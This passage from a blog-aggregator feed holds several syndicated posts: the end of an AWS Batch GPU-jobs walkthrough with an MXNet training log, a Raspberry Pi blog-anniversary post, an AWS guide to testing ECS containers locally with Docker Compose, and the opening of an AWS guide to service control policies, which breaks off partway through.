Even after all that, I had no certainty that the required GPU would actually be available to my job once it was running. Back then, there was no GPU pinning. Other jobs running on the same EC2 instance could use that GPU, making the orchestration of my jobs a tricky task.

Fast forward two years. Today, AWS Batch announced integrated support for Amazon EC2 Accelerated Instances. It is now possible to specify a number of GPUs as a resource that AWS Batch considers in choosing the EC2 instance to run your job, along with vCPU and memory. That allows me to take advantage of the main benefits of AWS Batch: the compute resource selection algorithm and the job scheduler. It also frees me from having to check which EC2 instance types have enough GPUs.

Also, I can take advantage of the Amazon ECS GPU-optimized AMI maintained by AWS. It comes with the NVIDIA drivers and all the necessary software to run GPU-enabled jobs. When I allow the P2 or P3 instance types on my compute environment, AWS Batch launches my compute resources using the Amazon ECS GPU-optimized AMI automatically.

In other words, now I don’t worry about the GPU task list mentioned earlier. I can focus on deciding which framework and command to run on my GPU-accelerated workload. At the same time, I’m now sure that my jobs have access to the required performance, as physical GPUs are pinned to each job and not shared among them.

A GPU race against the past

As a kind of GPU-race exercise, I checked a similar example to the one from Kiuk’s post, to see how fast it could be to run a GPU-enabled job now. I used the AWS Management Console to demonstrate how simple the steps are.

In this case, I decided to use the deep neural network architecture called multilayer perceptron (MLP), not the LeNet CNN, to compare the validation accuracy between them.

To make the test even simpler and faster to implement, I thought I would use one of the recently announced AWS Deep Learning containers, which come pre-packed with different frameworks and ready-to-process data. I chose the container that comes with MXNet and Python 2.7, customized for Training and GPU. For more information about the Docker images available, see the AWS Deep Learning Containers documentation.

In the AWS Batch console, I created a managed compute environment with the default settings, allowing AWS Batch to create the required IAM roles on my behalf.

On the configuration of the compute resources, I selected the P2 and P3 families of instances, as those are the type of instance with GPU capabilities. You can select On-Demand Instances, but in this case I decided to use Spot Instances to take advantage of the discounts that this pricing model offers. I left the defaults for all other settings, selecting the AmazonEC2SpotFleetRole role that I created the first time that I used Spot Instances:

Finally, I also left the network settings as default. My compute environment selected the default VPC, three subnets, and a security group. They are enough to run my jobs and at the same time keep my environment safe by limiting connections from outside the VPC:

I created a job queue, GPU_JobQueue, attaching it to the compute environment that I just created:

Next, I registered the same job definition that I would have created following Kiuk’s post. I specified enough memory to run this test, one vCPU, and the AWS Deep Learning Docker image that I chose, in this case mxnet-training:1.4.0-gpu-py27-cu90-ubuntu16.04. The number of GPUs required was, in this case, one. To have access to run the script, the container must run as privileged, or using the root user.

Finally, I submitted the job. I first cloned the MXNet repository for the train_mnist.py Python script. Then I ran the script itself, with the parameter --gpus 0 to indicate that the assigned GPU should be used. The job inherits all the other parameters from the job definition:

sh -c 'git clone -b 1.3.1 https://github.com/apache/incubator-mxnet.git && python /incubator-mxnet/example/image-classification/train_mnist.py --gpus 0'

That’s all, and my GPU-enabled job was running. It took me less than two minutes to go from zero to having the job submitted. This is the log of my job, from which I removed the iterations from epoch 1 to 18 to make it shorter:

14:32:31     Cloning into 'incubator-mxnet'...

14:33:50     Note: checking out '19c501680183237d52a862e6ae1dc4ddc296305b'.

14:33:51     INFO:root:start with arguments Namespace(add_stn=False, batch_size=64, disp_batches=100, dtype='float32', gc_threshold=0.5, gc_type='none', gpus='0', initializer='default', kv_store='device', load_epoch=None, loss='', lr=0.05, lr_factor=0.1, lr_step_epochs='10', macrobatch_size=0, model_prefix=None, mom=0.9, monitor=0, network='mlp', num_classes=10, num_epochs=20, num_examples=60000, num_layers=No

14:33:51     DEBUG:urllib3.connectionpool:Starting new HTTP connection (1): yann.lecun.com:80

14:33:54     DEBUG:urllib3.connectionpool:http://yann.lecun.com:80 "GET /exdb/mnist/train-labels-idx1-ubyte.gz HTTP/1.1" 200 28881

14:33:55     DEBUG:urllib3.connectionpool:Starting new HTTP connection (1): yann.lecun.com:80

14:33:55     DEBUG:urllib3.connectionpool:http://yann.lecun.com:80 "GET /exdb/mnist/train-images-idx3-ubyte.gz HTTP/1.1" 200 9912422

14:33:59     DEBUG:urllib3.connectionpool:Starting new HTTP connection (1): yann.lecun.com:80

14:33:59     DEBUG:urllib3.connectionpool:http://yann.lecun.com:80 "GET /exdb/mnist/t10k-labels-idx1-ubyte.gz HTTP/1.1" 200 4542

14:33:59     DEBUG:urllib3.connectionpool:Starting new HTTP connection (1): yann.lecun.com:80

14:34:00     DEBUG:urllib3.connectionpool:http://yann.lecun.com:80 "GET /exdb/mnist/t10k-images-idx3-ubyte.gz HTTP/1.1" 200 1648877

14:34:04     INFO:root:Epoch[0] Batch [0-100] Speed: 37038.30 samples/sec accuracy=0.793472

14:34:04     INFO:root:Epoch[0] Batch [100-200] Speed: 36457.89 samples/sec accuracy=0.906719

14:34:04     INFO:root:Epoch[0] Batch [200-300] Speed: 36981.20 samples/sec accuracy=0.927500

14:34:04     INFO:root:Epoch[0] Batch [300-400] Speed: 36925.04 samples/sec accuracy=0.935156

14:34:04     INFO:root:Epoch[0] Batch [400-500] Speed: 37262.36 samples/sec accuracy=0.940156

14:34:05     INFO:root:Epoch[0] Batch [500-600] Speed: 37729.64 samples/sec accuracy=0.942813

14:34:05     INFO:root:Epoch[0] Batch [600-700] Speed: 37493.55 samples/sec accuracy=0.949063

14:34:05     INFO:root:Epoch[0] Batch [700-800] Speed: 37320.80 samples/sec accuracy=0.953906

14:34:05     INFO:root:Epoch[0] Batch [800-900] Speed: 37705.85 samples/sec accuracy=0.958281

14:34:05     INFO:root:Epoch[0] Train-accuracy=0.924024

14:34:05     INFO:root:Epoch[0] Time cost=1.633

...  LOGS REMOVED

14:34:44     INFO:root:Epoch[19] Batch [0-100] Speed: 36864.44 samples/sec accuracy=0.999691

14:34:44     INFO:root:Epoch[19] Batch [100-200] Speed: 37088.35 samples/sec accuracy=1.000000

14:34:44     INFO:root:Epoch[19] Batch [200-300] Speed: 36706.91 samples/sec accuracy=0.999687

14:34:44     INFO:root:Epoch[19] Batch [300-400] Speed: 37941.19 samples/sec accuracy=0.999687

14:34:44     INFO:root:Epoch[19] Batch [400-500] Speed: 37180.97 samples/sec accuracy=0.999844

14:34:44     INFO:root:Epoch[19] Batch [500-600] Speed: 37122.30 samples/sec accuracy=0.999844

14:34:45     INFO:root:Epoch[19] Batch [600-700] Speed: 37199.37 samples/sec accuracy=0.999687

14:34:45     INFO:root:Epoch[19] Batch [700-800] Speed: 37284.93 samples/sec accuracy=0.999219

14:34:45     INFO:root:Epoch[19] Batch [800-900] Speed: 36996.80 samples/sec accuracy=0.999844

14:34:45     INFO:root:Epoch[19] Train-accuracy=0.999733

14:34:45     INFO:root:Epoch[19] Time cost=1.617

14:34:45     INFO:root:Epoch[19] Validation-accuracy=0.983579

Summary

As you can see, after AWS Batch launched the instance, the job took slightly more than two minutes to run. I spent roughly five minutes from start to finish. That was much faster than the time that I was previously spending just to configure the AMI. Using the AWS CLI, one of the AWS SDKs, or AWS CloudFormation, the same environment could be created even faster.

From a training point of view, I lost on validation accuracy, as the results obtained using the LeNet CNN are higher than with an MLP network. On the other hand, my job was faster, with a time cost of 1.6 seconds on average for each epoch. As the software stack evolves and hardware capabilities increase, these numbers keep improving, but that shouldn’t mean extra complexity. Using managed primitives like the one presented in this post enables a simpler implementation.

I encourage you to test this example and see for yourself how just a few clicks or commands let you start running GPU jobs with AWS Batch. Then, it is just a matter of replacing the Docker image that I used with one that has the framework of your choice: TensorFlow, Caffe, PyTorch, Keras, etc. Start running your GPU-enabled machine learning, deep learning, computational fluid dynamics (CFD), seismic analysis, molecular modeling, genomics, or computational finance workloads. It’s faster and easier than ever.

If you decide to give it a try, have any doubt or just want to let me know what you think about this post, please write in the comments section!

Eight years, 2000 blog posts

Post Syndicated from Liz Upton original https://www.raspberrypi.org/blog/eight-years-2000-blog-posts/

Today’s a bit of a milestone for us: this is the 2000th post on this blog.

Why does a computer company have a blog? When did it start, who writes it, and where does the content come from? And don’t you have sore fingers? All of these are good questions: I’m here to answer them for you.

The first ever Raspberry Pi blog post

Marital circumstances being what they are, I had a front-row view of everything that was going on at Raspberry Pi, right from the original conversations that kicked the project off in 2009. In 2011, when development was still being done on Eben’s and my kitchen table, we met with sudden and slightly alarming fame when Rory Cellan-Jones from the BBC shot a short video of a prototype Raspberry Pi and blogged about it – his post went viral. I was working as a freelance journalist and editor at the time, but realised that we weren’t going to get a better chance to kickstart a community, so I dropped my freelance work and came to work full-time for Raspberry Pi.

Setting up an instantiation of WordPress so we could talk to all Rory’s readers, each of whom decided we’d promised we’d make them a $25 computer, was one of the first orders of business. We could use the WordPress site to announce news, and to run a sort of devlog, which is what became this blog; back then, many of our blog posts were about the development of the original Raspberry Pi.

It was a lovely time to be writing about what we do, because we could be very open about the development process and how we were moving towards launch in a way that sadly, is closed to us today. (If we’d blogged about the development of Raspberry Pi 3 in the detail we’d blogged about Raspberry Pi 1, we’d not only have been handing sensitive and helpful commercial information to the large number of competitor organisations that have sprung up like mushrooms since that original launch; but you’d also all have stopped buying Pi 2 in the run-up, starving us of the revenue we need to do the development work.)

Once Raspberry Pis started making their way into people’s hands in early 2012, I realised there was something else that it was important to share: news about what new users were doing with their Pis. And I will never, ever stop being shocked at the applications of Raspberry Pi that you come up with. Favourites from over the years? The paludarium’s still right up there (no, I didn’t know what a paludarium was either when I found out about it); the cucumber sorter’s brilliant; and the home-brew artificial pancreas blows my mind. I’ve a particular soft spot for musical projects (which I wish you guys would comment on a bit more so I had an excuse to write about more of them).



As we’ve grown, my job has grown too, so I don’t write all the posts here like I used to. I oversee press, communications, marketing and PR for Raspberry Pi Trading now, working with a team of writers, editors, designers, illustrators, photographers, videographers and managers – it’s very different from the days when the office was that kitchen table. Alex Bate, our magisterial Head of Social Media, now writes a lot of what you see on this blog, but it’s always a good day for me when I have time to pitch in and write a post.

I’d forgotten some of the early stuff before looking at 2011’s blog posts to jog my memory as I wrote today’s. What were we thinking when we decided to ship without GPIO pins soldered on? (Happily for the project and for the 25,000,000 Pi owners all over the world in 2019, we changed our minds before we finally launched.) Just how many days in aggregate did I spend stuffing envelopes with stickers at £1 a throw to raise some early funds to get the first PCBs made? (I still have nightmares about the paper cuts.) And every time I think I’m having a bad day, I need to remember that this thing happened, and yet everything was OK again in the end. (The backs of my hands have gone all prickly just thinking about it.) Now I think about it, the Xenon Death Flash happened too. We also survived that.

At the bottom of it all, this blog has always been about community. It’s about sharing what we do, what you do, and making links between people all over the world who have this little machine in common. The work you do telling people about Raspberry Pi, putting it into your own projects, and supporting us by buying the product doesn’t just help us make hardware: every penny we make funds the Raspberry Pi Foundation’s charitable work, helps kids on every continent to learn the skills they need to make their own futures better, and, we think, makes the world a better place. So thank you. As long as you keep reading, we’ll keep writing.

The post Eight years, 2000 blog posts appeared first on Raspberry Pi.

A Guide to Locally Testing Containers with Amazon ECS Local Endpoints and Docker Compose

Post Syndicated from Anuneet Kumar original https://aws.amazon.com/blogs/compute/a-guide-to-locally-testing-containers-with-amazon-ecs-local-endpoints-and-docker-compose/

This post is contributed by Wesley Pettit, Software Engineer at AWS.

As more companies adopt containers, developers need easy, powerful ways to test their containerized applications locally, before they deploy to AWS. Today, the containers team is releasing the first tool dedicated to this: Amazon ECS Local Container Endpoints. This is part of an ongoing open source project designed to improve the local development process for Amazon Elastic Container Service (ECS) and AWS Fargate.  This first step allows you to locally simulate the ECS Task Metadata V2 and V3 endpoints and IAM Roles for Tasks.

In this post, I will walk you through the following testing scenarios enabled by Amazon ECS Local Endpoints and Docker Compose:

  • Testing a container that needs credentials to interact with AWS Services
  • Testing a container which uses Task Metadata
  • Testing a multi-container app which uses the awsvpc or host network mode on Docker For Mac and Docker For Windows
  • Testing multiple containerized applications using local service discovery

Setup

Your local testing toolkit consists of Docker, Docker Compose, and awslabs/amazon-ecs-local-container-endpoints.  To follow along with the scenarios in this post, you will need to have locally installed the Docker Daemon, the Docker Command Line, and Docker Compose.

Once you have the dependencies installed, create a Docker Compose file called docker-compose.yml. The Compose file defines the settings needed to run your application. If you have never used Docker Compose before, check out Docker’s Getting Started with Compose tutorial. This example file defines a web application:

version: "2"
services:
  app:
    build:
      # Build an image from the Dockerfile in the current directory
      context: .
    ports:
      - 8080:80
    environment:
      PORT: "80"

Make sure to save your docker-compose.yml file: it will be needed for the rest of the scenarios.

Our First Scenario: Testing a container which needs credentials to interact with AWS Services

Say I have a container which I want to test locally that needs AWS credentials. I could accomplish this by providing credentials as environment variables on the container, but that would be a bad practice. Instead, I can use Amazon ECS Local Endpoints to safely vend credentials to a local container.

The following Docker Compose override file template defines a single container that will use credentials. It should be used along with the docker-compose.yml file you created in the setup section. Name this file docker-compose.override.yml (Docker Compose knows to automatically use both of the files).

Your docker-compose.override.yml file should look like this:

version: "2"
networks:
    # This special network is configured so that the local metadata
    # service can bind to the specific IP address that ECS uses
    # in production
    credentials_network:
        driver: bridge
        ipam:
            config:
                - subnet: "169.254.170.0/24"
                  gateway: 169.254.170.1
services:
    # This container vends credentials to your containers
    ecs-local-endpoints:
        # The Amazon ECS Local Container Endpoints Docker Image
        image: amazon/amazon-ecs-local-container-endpoints
        volumes:
          # Mount /var/run so we can access docker.sock and talk to Docker
          - /var/run:/var/run
          # Mount the shared configuration directory, used by the AWS CLI and AWS SDKs
          # On Windows, this directory can be found at "%UserProfile%\.aws"
          - $HOME/.aws/:/home/.aws/
        environment:
          # define the home folder; credentials will be read from $HOME/.aws
          HOME: "/home"
          # You can change which AWS CLI Profile is used
          AWS_PROFILE: "default"
        networks:
            credentials_network:
                # This special IP address is recognized by the AWS SDKs and AWS CLI 
                ipv4_address: "169.254.170.2"
                
    # Here we reference the application container that we are testing
    # You can test multiple containers at a time, simply duplicate this section
    # and customize it for each container, and give it a unique IP in 'credentials_network'.
    app:
        depends_on:
            - ecs-local-endpoints
        networks:
            credentials_network:
                ipv4_address: "169.254.170.3"
        environment:
          AWS_DEFAULT_REGION: "us-east-1"
          AWS_CONTAINER_CREDENTIALS_RELATIVE_URI: "/creds"

To test your container locally, run:

docker-compose up

Your container will now be running and will be using temporary credentials obtained from your default AWS Command Line Interface Profile.

NOTE: You should not use your production credentials locally. If you provide the ecs-local-endpoints with an AWS Profile that has access to your production account, then your application will be able to access/modify production resources from your local testing environment. We recommend creating separate development and production accounts.

How does this work?

In this example, we have created a User Defined Docker Bridge Network which allows the Local Container Endpoints to listen at the IP Address 169.254.170.2. We have also defined the environment variable AWS_CONTAINER_CREDENTIALS_RELATIVE_URI on our application container. The AWS SDKs and AWS CLI are all designed to retrieve credentials by making HTTP requests to http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI. When containers run in production on ECS, the ECS Agent vends credentials to containers via this endpoint; this is how IAM Roles for Tasks is implemented.

Amazon ECS Local Container Endpoints vends credentials to containers the same way as the ECS Agent does in production. In this case, it vends temporary credentials obtained from your default AWS CLI Profile. It can do that because it mounts your .aws folder, which contains credentials and configuration for the AWS CLI.

Gotchas: Things to Keep in Mind when using ECS Local Container Endpoints and Docker Compose

  • Make sure every container in the credentials_network has a unique IP Address. If you don’t do this, Docker Compose can incorrectly try to assign 169.254.170.2 (the ecs-local-endpoints container IP) to one of the application containers. This will cause your Compose project to fail to start.
  • On Windows, replace $HOME/.aws/ in the volumes declaration for the endpoints container with the correct location of the AWS CLI configuration directory, as explained in the documentation.
  • Notice that the application container is named ‘app’ in both of the example file templates. You must make sure the container names match between your docker-compose.yml and docker-compose.override.yml. When you run docker-compose up, the files will be merged. The settings in each file for each container will be merged, so it’s important to use consistent container names between the two files.

Scenario Two: Testing using Task IAM Role credentials

The endpoints container image can also vend credentials from an IAM Role; this allows you to test your application locally using a Task IAM Role.

NOTE: You should not use your production Task IAM Role locally. Instead, create a separate testing role, with equivalent permissions scoped to testing resources. Modifying the trust boundary of a production role will expand its scope.

In order to use a Task IAM Role locally, you must modify its trust policy. First, get the ARN of the IAM user defined by your default AWS CLI Profile (replace default with a different Profile name if needed):

aws --profile default sts get-caller-identity

Then modify your Task IAM Role so that its trust policy includes the following statement. You can find instructions for modifying IAM Roles in the IAM Documentation.

    {
      "Effect": "Allow",
      "Principal": {
        "AWS": <ARN of the user found with get-caller-identity>
      },
      "Action": "sts:AssumeRole"
    }

To use your Task IAM Role in your docker compose file for local testing, simply change the value of the AWS container credentials relative URI environment variable on your application container:

AWS_CONTAINER_CREDENTIALS_RELATIVE_URI: "/role/<name of your role>"

For example, if your role is named ecs_task_role, then the environment variable should be set to "/role/ecs_task_role". That is all that is required; the ecs-local-endpoints container will now vend credentials obtained from assuming the task role. You can use this to validate that the permissions set on your Task IAM Role are sufficient to run your application.

Scenario Three: Testing a Container that uses Task Metadata endpoints

The Task Metadata endpoints are useful; they allow a container running on ECS to obtain information about itself at runtime. This enables many use cases; my favorite is that it allows you to obtain container resource usage metrics, as shown by this project.

With Amazon ECS Local Container Endpoints, you can locally test applications that use the Task Metadata V2 or V3 endpoints. If you want to use the V2 endpoint, the Docker Compose template shown at the beginning of this post is sufficient. If you want to use V3, simply add another environment variable to each of your application containers:

ECS_CONTAINER_METADATA_URI: "http://169.254.170.2/v3"

This is the environment variable defined by the V3 metadata spec.

Scenario Four: Testing an Application that uses the AWSVPC network mode

Thus far, all of our examples have involved testing containers in a bridge network. But what if you have an application that uses the awsvpc network mode? Can you test these applications locally?

Your local development machine will not have Elastic Network Interfaces. If your ECS Task consists of a single container, then the bridge network used in previous examples will suffice. However, if your application consists of multiple containers that need to communicate, then awsvpc differs significantly from bridge. As noted in the AWS Documentation:

“containers that belong to the same task can communicate over the localhost interface.”

This is one of the benefits of awsvpc; it makes inter-container communication easy. To simulate this locally, a different approach is needed.

If your local development machine is running linux, then you are in luck. You can test your containers using the host network mode, which will allow them to all communicate over localhost. Instructions for how to set up iptables rules to allow your containers to receive credentials and metadata is documented in the ECS Local Container Endpoints Project README.

If you are like me, and do most of your development on Windows or Mac machines, then this option will not work. Docker only supports host mode on Linux. Luckily, this section describes a workaround that will allow you to locally simulate awsvpc on Docker For Mac or Docker For Windows. This also partly serves as a simulation of the host network mode, in the sense that all of your containers will be able to communicate over localhost (from a local testing standpoint, host and awsvpc are functionally the same; the key requirement is that all containers share a single network interface).

In ECS, awsvpc is implemented by first launching a single container, which we call the ‘pause container’. This container is attached to the Elastic Network Interface, and then all of the containers in your task are launched into the pause container’s network namespace. For the local simulation of awsvpc, a similar approach will be used.

First, create a Dockerfile with the following contents for the ‘local’ pause container.

FROM amazonlinux:latest
RUN yum install -y iptables

CMD iptables -t nat -A PREROUTING -p tcp -d 169.254.170.2 --dport 80 -j DNAT --to-destination 127.0.0.1:51679 \
 && iptables -t nat -A OUTPUT -d 169.254.170.2 -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 51679 \
 && iptables-save \
 && /bin/bash -c 'while true; do sleep 30; done;'

This Dockerfile defines a container image which sets some iptables rules and then sleeps forever. The routing rules will allow requests to the credentials and metadata service to be forwarded from 169.254.170.2:80 to localhost:51679, which is the port ECS Local Container Endpoints will listen at in this setup.

Build the image:

docker build -t local-pause:latest .

Now, edit your docker-compose.override.yml file so that it looks like the following:

version: "2"
services:
    ecs-local-endpoints:
        image: amazon/amazon-ecs-local-container-endpoints
        volumes:
          - /var/run:/var/run
          - $HOME/.aws/:/home/.aws/
        environment:
          ECS_LOCAL_METADATA_PORT: "51679"
          HOME: "/home"
        network_mode: container:local-pause

    app:
        depends_on:
            - ecs-local-endpoints
        network_mode: container:local-pause
        environment:
          ECS_CONTAINER_METADATA_URI: "http://169.254.170.2/v3/containers/app"
          AWS_CONTAINER_CREDENTIALS_RELATIVE_URI: "/creds"

Several important things to note:

  • ECS_LOCAL_METADATA_PORT is set to 51679; this is the port that was used in the iptables rules.
  • network_mode is set to container:local-pause for all the containers, which means that they will use the networking stack of a container named local-pause.
  • ECS_CONTAINER_METADATA_URI is set to http://169.254.170.2/v3/containers/app. This is important. In bridge mode, the local endpoints container can determine which container a request came from using the IP Address in the request. In simulated awsvpc, this will not work, since all of the containers share the same IP Address. Thus, the endpoints container supports using the container name in the request URI so that it can identify which container the request came from. In this case, the container is named app, so app is appended to the value of the environment variable. If you copy the app container configuration to add more containers to this compose file, make sure you update the value of ECS_CONTAINER_METADATA_URI for each new container.
  • Remove any port declarations from your docker-compose.yml file. These are not valid with the network_mode settings that you will be using. The text below explains how to expose ports in this simulated awsvpc network mode.

Before you run the compose file, you must launch the local-pause container. This container can not be defined in the Docker Compose file, because in Compose there is no way to define that one container must be running before all the others. You might think that the depends_on setting would work, but this setting only determines the order in which containers are started. It is not a robust solution for this case.

One key thing to note: any ports used by your application containers must be defined on the local-pause container. You cannot define ports directly on your application containers because their network mode is set to container:local-pause. This is a limitation imposed by Docker.

Assuming that your application containers need to expose ports 8080 and 3306 (replace these with the actual ports used by your applications), run the local pause container with this command:

docker run -d -p 8080:8080 -p 3306:3306 --name local-pause --cap-add=NET_ADMIN local-pause

Then, simply run the docker compose files, and you will have containers which share a single network interface and have access to credentials and metadata!

Scenario Five: Testing multiple applications with local Service Discovery

Thus far, all of the examples have focused on running a single containerized application locally. But what if you want to test multiple applications which run as separate Tasks in production?

Docker Compose allows you to set up DNS aliases for your containers. This allows them to talk to each other using a hostname.

For this example, return to the compose override file with a bridge network shown in scenarios one through three. Here is a docker-compose.override.yml file which implements a simple scenario. There are two applications, frontend and backend. Frontend needs to make requests to backend.

version: "2"
networks:
    credentials_network:
        driver: bridge
        ipam:
            config:
                - subnet: "169.254.170.0/24"
                  gateway: 169.254.170.1
services:
    # This container vends credentials to your containers
    ecs-local-endpoints:
        # The Amazon ECS Local Container Endpoints Docker Image
        image: amazon/amazon-ecs-local-container-endpoints
        volumes:
          - /var/run:/var/run
          - $HOME/.aws/:/home/.aws/
        environment:
          HOME: "/home"
          AWS_PROFILE: "default"
        networks:
            credentials_network:
                ipv4_address: "169.254.170.2"
                aliases:
                    - endpoints
    # settings for the containers which you are testing
    frontend:
        image: amazonlinux:latest
        command: /bin/bash -c 'while true; do sleep 30; done;'
        depends_on:
            - ecs-local-endpoints
        networks:
            credentials_network:
                ipv4_address: "169.254.170.3"
        environment:
          AWS_DEFAULT_REGION: "us-east-1"
          AWS_CONTAINER_CREDENTIALS_RELATIVE_URI: "/creds"
    backend:
        image: nginx
        networks:
            credentials_network:
                # define an alias for service discovery
                aliases:
                    - backend
                ipv4_address: "169.254.170.4"

With these settings, the frontend container can find the backend container by making requests to http://backend.

Conclusion

In this tutorial, you have seen how to use Docker Compose and awslabs/amazon-ecs-local-container-endpoints to test your Amazon ECS and AWS Fargate applications locally before you deploy.

You have learned how to:

  • Construct docker-compose.yml and docker-compose.override.yml files.
  • Test a container locally with temporary credentials from a local AWS CLI Profile.
  • Test a container locally using credentials from an ECS Task IAM Role.
  • Test a container locally that uses the Task Metadata Endpoints.
  • Locally simulate the awsvpc network mode.
  • Use Docker Compose service discovery to locally test multiple dependent applications.

To follow along with new developments to the local development project, you can head to the public AWS Containers Roadmap on GitHub. If you have questions, comments, or feedback, you can let the team know there!

How to use service control policies to set permission guardrails across accounts in your AWS Organization

Post Syndicated from Michael Switzer original https://aws.amazon.com/blogs/security/how-to-use-service-control-policies-to-set-permission-guardrails-across-accounts-in-your-aws-organization/

AWS Organizations provides central governance and management for multiple accounts. Central security administrators use service control policies (SCPs) with AWS Organizations to establish controls that all IAM principals (users and roles) adhere to. Now, you can use SCPs to set permission guardrails with the fine-grained control supported in the AWS Identity and Access Management (IAM) policy language. This makes it easier for you to fine-tune policies to meet the precise requirements of your organization’s governance rules.

Now, using SCPs, you can specify Conditions, Resources, and NotAction to deny access across accounts in your organization or organizational unit. For example, you can use SCPs to restrict access to specific AWS Regions, or prevent your IAM principals from deleting common resources, such as an IAM role used for your central administrators. You can also define exceptions to your governance controls, restricting service actions for all IAM entities (users, roles, and root) in the account except a specific administrator role.

To implement permission guardrails using SCPs, you can use the new policy editor in the AWS Organizations console. This editor makes it easier to author SCPs by guiding you to add actions, resources, and conditions. In this post, I review SCPs, walk through the new capabilities, and show how to construct an example SCP you can use in your organization today.

Overview of Service Control Policy concepts

Before I walk through some examples, I’ll review a few features of SCPs and AWS Organizations.

SCPs offer central access controls for all IAM entities in your accounts. You can use them to enforce the permissions you want everyone in your business to follow. Using SCPs, you can give your developers more freedom to manage their own permissions because you know they can only operate within the boundaries you define.

You create and apply SCPs through AWS Organizations. When you create an organization, AWS Organizations automatically creates a root, which forms the parent container for all the accounts in your organization. Inside the root, you can group accounts in your organization into organizational units (OUs) to simplify management of these accounts. You can create multiple OUs within a single organization, and you can create OUs within other OUs to form a hierarchical structure. You can attach SCPs to the organization root, OUs, and individual accounts. SCPs attached to the root and OUs apply to all OUs and accounts inside of them.

SCPs use the AWS Identity and Access Management (IAM) policy language; however, they do not grant permissions. SCPs enable you to set permission guardrails by defining the maximum available permissions for IAM entities in an account. If an SCP denies an action for an account, none of the entities in the account can take that action, even if their IAM permissions allow them to do so. The guardrails set in SCPs apply to all IAM entities in the account, which include all users, roles, and the account root user.

Policy Elements Available in SCPs

The table below summarizes the IAM policy language elements available in SCPs. You can read more about the different IAM policy elements in the IAM JSON Policy Reference.

The Supported Statement Effect column describes the effect type you can use with each policy element in SCPs.

Policy Element | Definition | Supported Statement Effect
Statement | Main element for a policy. Each policy can have multiple statements. | Allow, Deny
Sid | (Optional) Friendly name for the statement. | Allow, Deny
Effect | Define whether a SCP statement allows or denies actions in an account. | Allow, Deny
Action | List the AWS actions the SCP applies to. | Allow, Deny
NotAction (New) | (Optional) List the AWS actions exempt from the SCP. Used in place of the Action element. | Deny
Resource (New) | List the AWS resources the SCP applies to. | Deny
Condition (New) | (Optional) Specify conditions for when the statement is in effect. | Deny

Note: Some policy elements are only available in SCPs that deny actions.

You can use the new policy elements in new or existing SCPs in your organization. In the next section, I use the new elements to create an SCP using the AWS Organizations console.

Create an SCP in the AWS Organizations console

In this section, you’ll create an SCP that restricts IAM principals in accounts from making changes to a common administrative IAM role created in all accounts in your organization. Imagine your central security team uses these roles to audit and make changes to AWS settings. For the purposes of this example, you have a role in all your accounts named AdminRole that has the AdministratorAccess managed policy attached to it. Using an SCP, you can restrict all IAM entities in the account from modifying AdminRole or its associated permissions. This helps you ensure this role is always available to your central security team. Here are the steps to create and attach this SCP.

  1. Ensure you’ve enabled all features in AWS Organizations and SCPs through the AWS Organizations console.
  2. In the AWS Organizations console, select the Policies tab, and then select Create policy.

    Figure 1: Select “Create policy” on the “Policies” tab

  3. Give your policy a name and description that will help you quickly identify it. For this example, I use the following name and description.
    • Name: DenyChangesToAdminRole
    • Description: Prevents all IAM principals from making changes to AdminRole.

     

    Figure 2: Give the policy a name and description

  4. The policy editor provides you with an empty statement in the text editor to get started. Position your cursor inside the policy statement. The editor detects the content of the policy statement you selected, and allows you to add relevant Actions, Resources, and Conditions to it using the left panel.

    Figure 3: SCP editor tool

  5. Change the Statement ID to describe what the statement does. For this example, I reused the name of the policy, DenyChangesToAdminRole, because this policy has only one statement.

    Figure 4: Change the Statement ID

  6. Next, add the actions you want to restrict. Using the left panel, select the IAM service. You’ll see a list of actions. To learn about the details of each action, you can hover over the action with your mouse. For this example, we want to allow principals in the account to view the role, but restrict any actions that could modify or delete it. We use the new NotAction policy element to deny all actions except the view actions for the role. Select the following view actions from the list:
    • GetContextKeysForPrincipalPolicy
    • GetRole
    • GetRolePolicy
    • ListAttachedRolePolicies
    • ListInstanceProfilesForRole
    • ListRolePolicies
    • ListRoleTags
    • SimulatePrincipalPolicy
  7. Now position your cursor at the Action element and change it to NotAction. After you perform the steps above, your policy should look like the one below.

    Figure 5: An example policy

  8. Next, apply these controls to only the AdminRole role in your accounts. To do this, use the Resource policy element, which now allows you to provide specific resources.
      1. On the left, near the bottom, select the Add Resources button.
      2. In the prompt, select the IAM service from the dropdown menu.
      3. Select the role as the resource type, and then type “arn:aws:iam::*:role/AdminRole” in the resource ARN prompt.
      4. Select Add resource.

    Note: The AdminRole has a common name in all accounts, but the account IDs will be different for each individual role. To simplify the policy statement, use the * wildcard in place of the account ID to account for all roles with this name regardless of the account.

  9. Your policy should look like this:
    
    {    
      "Version": "2012-10-17",
      "Statement": [
        {
          "Sid": "DenyChangesToAdminRole",
          "Effect": "Deny",
          "NotAction": [
            "iam:GetContextKeysForPrincipalPolicy",
            "iam:GetRole",
            "iam:GetRolePolicy",
            "iam:ListAttachedRolePolicies",
            "iam:ListInstanceProfilesForRole",
            "iam:ListRolePolicies",
            "iam:ListRoleTags",
            "iam:SimulatePrincipalPolicy"
          ],
          "Resource": [
            "arn:aws:iam::*:role/AdminRole"
          ]
        }
      ]
    }
    

  10. Select the Save changes button to create your policy. You can see the new policy in the Policies tab.

    Figure 6: The new policy on the “Policies” tab

  11. Finally, attach the policy to the AWS account where you want to apply the permissions.

When you attach the SCP, it prevents changes to the role’s configuration. The central security team that uses the role might want to make changes later on, so you may want to allow the role itself to modify the role’s configuration. I’ll demonstrate how to do this in the next section.
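To check the guardrail, you can sign in as any principal in the member account and try an action that the SCP does not exempt. The commands below are a minimal sketch; the profile name is a placeholder for credentials in the account where you attached the policy.

# Read-only actions listed in NotAction are still allowed.
aws iam get-role --role-name AdminRole --profile member-account-dev

# Mutating actions such as iam:AttachRolePolicy are not in the NotAction list,
# so the SCP denies them for every principal in the account.
aws iam attach-role-policy \
  --role-name AdminRole \
  --policy-arn arn:aws:iam::aws:policy/ReadOnlyAccess \
  --profile member-account-dev
# The second call should fail with an explicit deny caused by the service control policy.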

Grant an exception to your SCP for an administrator role

In the previous section, you created an SCP that prevented all principals from modifying or deleting the AdminRole IAM role. Administrators from your central security team may need to make changes to this role in your organization, without lifting the protection of the SCP. In this next example, I build on the previous policy to show how to exclude the AdminRole from the SCP guardrail.

  1. In the AWS Organizations console, select the Policies tab, select the DenyChangesToAdminRole policy, and then select Policy editor.
  2. Select Add Condition. You’ll use the new Condition element of the policy, using the aws:PrincipalARN global condition key, to specify the role you want to exclude from the policy restrictions.
